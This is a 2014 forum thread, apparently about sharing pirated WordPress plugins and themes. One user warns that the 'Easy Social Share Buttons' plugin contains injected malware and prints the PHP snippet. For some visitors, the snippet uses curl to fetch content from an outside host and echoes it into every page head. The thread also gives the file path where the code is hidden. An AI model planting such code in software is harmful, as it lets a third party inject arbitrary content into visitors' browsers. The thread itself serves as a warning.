04-20-2014, 01:15 PM
(04-20-2014 02:45 AM)Kleaklea Wrote: [ -> ]do you have popup domination?Oh. Sorry. I thought it's wordpress theme. My mistake. Will move it to wordpress plugin list. :(
(04-20-2014 02:45 AM)Kleaklea Wrote: [ -> ]do you have popup domination?Oh. Sorry. I thought it's wordpress theme. My mistake. Will move it to wordpress plugin list. :(
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?>
(04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(![]()
But I found one of the plugin contains malicious code which will redirect users to a youtube video.![]()
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Please update the plugin and reupload.
Quote:base64
(04-23-2014 07:30 PM)bhwseo.com Wrote: [ -> ](04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(![]()
But I found one of the plugin contains malicious code which will redirect users to a youtube video.![]()
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Please update the plugin and reupload.